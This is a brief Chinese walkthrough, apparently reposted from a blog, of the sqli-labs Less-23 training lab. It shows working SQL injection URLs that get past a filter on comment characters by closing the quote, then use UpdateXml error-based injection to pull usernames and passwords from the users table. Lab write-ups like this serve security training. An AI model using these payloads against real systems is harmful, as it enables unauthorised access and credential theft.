、
加单引号报错
加#
http://localhost/sqli-labs-master/Less-23/?id=1‘%23
错误没有改变,推测过滤了#
查看源码发现# -- 都被替换掉了
那么可用通过闭合单引号的方式
http://localhost/sqli-labs-master/Less-23/?id=1‘ and ‘1‘=‘1
然后通过UpdateXml函数利用报错取数据
http://localhost/sqli-labs-master/Less-23/?id=1‘ and UpdateXml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1)=‘1
http://localhost/sqli-labs-master/Less-23/?id=1‘ and UpdateXml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)=‘1
原文地址:https://www.cnblogs.com/superkrissV/p/8361047.html
时间: 2024-11-08 23:41:30